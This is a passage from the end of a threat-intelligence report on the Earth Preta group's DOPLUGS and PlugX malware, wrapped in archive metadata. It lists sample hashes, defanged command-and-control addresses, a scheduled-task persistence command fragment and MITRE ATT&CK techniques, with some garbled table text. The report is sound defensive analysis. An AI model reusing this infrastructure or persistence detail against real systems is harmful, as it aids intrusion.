/F\u0026schtasks.exe /run /tn \"Security WIFI3 Script\"\r\nOld variant\r\nIn addition to DOPLUGS, we hunted down several customized PlugX malware samples that are also equipped with the\r\nKillSomeOne module. Based on our investigation, this integration would have been active for three years, with the report\r\npublished by Avira being the first to reveal this technique. The sample mentioned in Avira’s report is the first PlugX variant\r\nwith the KillSomeOne module designed for spreading via USB.\r\nThe following table is a list of different PlugX malware types with integrate KillSomeOne variants:\r\nActive since\r\n(approximation)\r\nSample hash (SHA256) Variant C\u0026C server\r\nNovember 2023  3fa7eaa4697cfcf71d0bd5aa9d2dbec495d7eac43bdfcfbef07a306635e4973b\r\nKillSomeOne\r\n+ DOPLUGS\r\n45[.]83[.]236[.]10\r\nDecember 2022\r\nto May 2023\r\n17225c9e46f809556616d9e09d29fd7c13ca90d25ae21e00cc9ad7857ee66b82 KillSomeOne\r\n+\r\n(Transitioning\r\nbetween\r\n45[.]131[.]179[.]1\r\n45[.]131[.]179[.]1\r\n45[.]131[.]179[.]1\r\n103[.]192[.]226[.\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 22 of 24\n\nHodur and\r\nDOPLUGS)\r\n3127.0.0.1:80\r\n \r\nSeptember 2021\r\nto December\r\n2022\r\nd0ca6917c042e417da5996efa49afca6cb15f09e3b0b41cbc94aab65a409e9dc\r\nKillSomeOne\r\n+ Hodur\r\nFirst  category\r\n154[.]204.27.181\r\n154[.]204.27.181\r\n103[.]56.53.120:8\r\n103[.]56.53.120:8\r\nSecond category\r\n176[.]113.69.91:4\r\nSeptember 2018 d64afd9799d8de3f39a4ce99584fa67a615a667945532cfa3f702adbe27724c4\r\nKillSomeOne\r\n+ first variant\r\nof the PlugX\r\nmalware\r\n45[.]251[.]240[.]5\r\n45[.]251[.]240[.]5\r\nTable 13. Different stages of evolution for KillSomeOne + PlugX\r\nUpon checking backdoor commands of these PlugX malware types, we found an additional variant that serves as the\r\ntransition from DOPLUGS to Hodur. This version keeps the disk module of the general type of the PlugX malware, although\r\nhere the customized backdoor command is modified to the improved DOPLUGS type (unlike the original DOPLUGS\r\nvariant without any module from the general type of the PlugX malware). Another impressive feature is that the\r\nKillSomeOne + Hodur variant has two categories of C\u0026C servers for communication: the first one as a regular C\u0026C server\r\nto receive backdoor commands, while the second one is designed to download payloads for process injection in svchost.exe.\r\nConclusion\r\nEarth Preta has primarily focused on targeting government entities worldwide, particularly within the Asia-Pacific region\r\nand Europe. Based on our observations, we believe Earth Preta tends to use spear-phishing emails and Google Drive links in\r\nits attacks.\r\nWe explained the purpose of the DOPLUGS malware (which we believe has been in use since 2022), one of the primary\r\ntools Earth Preta uses to download the general type of the PlugX malware. While hunting for other samples, we discovered a\r\nDOPLUGS variant that has KillSomeOne module integration and that can be traced back to 2018. This shows that Earth\r\nPreta has been refining its tools for some time now, constantly adding new functionalities and features.  \r\nOver the course of our investigations into Earth Preta’s activities, we have observed that the group remains highly active,\r\nparticularly in Europe and Asia. It is likely that we will hear more from this group in the future, so it is a good idea for\r\nsecurity teams to familiarize themselves with how Earth Preta operates.\r\nMITRE ATT\u0026CK\r\nTactic ID Name\r\nResource Development\r\nT1583.004 Acquire Infrastructure: Server\r\nT1587.001 Develop Capabilities: Malware\r\nT1585.002 Establish Accounts: Email Accounts\r\nT1588.002 Obtain Capabilities: Tool\r\nT1608.001 Stage Capabilities: Upload Malware\r\nT1608.005 Link Target\r\nInitial Access T1566.002 Phishing: Spearphishing Link\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 23 of 24\n\nT1090 Replication Through Removable Media\r\nExecution T1204.002 User Execution: Malicious File\r\nPersistence\r\nT1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nT1574.002 Hijack Execution Flow: DLL Side-Loading\r\nT1053.005 Scheduled Task/Job: Scheduled Task\r\nDefense Evasion\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1036.005 Masquerading: Match Legitimate Name or Location\r\nT1070.009 Indicator Removal: Clear Persistence\r\nT1564.001 Hidden Files and Directories\r\nCredential Access T1056.001 Input Capture: Keylogging\r\nDiscovery\r\nT1083 File and Directory Discovery\r\nT1016.001 Internet Connection Discovery\r\nT1049 System Network Connections Discovery\r\nT1082 System Information Discovery\r\nT1012 Query Registry\r\nLateral Movement T1091 Replication Through Removable Media\r\nCollection\r\nT1005 Data from Local System\r\nT1025 Data from Removable Media\r\nCommand and Control\r\nT1071.001 Application Layer Protocol: Web Protocols\r\nT1573 Encrypted Channel\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 24 of 24", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html" ], "report_names": [ "earth-preta-campaign-targets-asia-doplugs.html" ], "threat_actors": [ { "id": "2ff375ef-7859-4d44-9399-06c9d1d9359c", "created_at": "2023-07-11T02:00:10.063244Z", "updated_at": "2026-04-10T02:00:03.367017Z", "deleted_at": null, "main_name": "SmugX", "aliases": [], "source_name": "MISPGALAXY:SmugX", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "aa90ad17-8852-4732-9dba-72ffb64db493", "created_at": "2023-07-11T02:00:10.067957Z", "updated_at": "2026-04-10T02:00:03.367801Z", "deleted_at": null, "main_name": "RedDelta", "aliases": [], "source_name": "MISPGALAXY:RedDelta", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "b5449533-0ff1-4048-999d-7d4bfd8e6da6", "created_at": "2022-10-25T16:07:24.114365Z", "updated_at": "2026-04-10T02:00:04.869887Z", "deleted_at": null, "main_name": "RedDelta", "aliases": [ "Operation Dianxun", "TA416" ], "source_name": "ETDA:RedDelta", "tools": [ "Agent.dhwf", "Agentemis", "Chymine", "Cobalt Strike", "CobaltStrike", "Darkmoon", "Destroy RAT", "DestroyRAT", "Gen:Trojan.Heur.PT", "Kaba", "Korplug", "PlugX", "Poison Ivy", "RedDelta", "SPIVY", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Xamtrav", "cobeacon", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434643, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e4fd3b05fff6cc3c9f1f1499137b71dd531d7237.pdf", "text": "https://archive.orkl.eu/e4fd3b05fff6cc3c9f1f1499137b71dd531d7237.txt", "img": "https://archive.orkl.eu/e4fd3b05fff6cc3c9f1f1499137b71dd531d7237.jpg" } }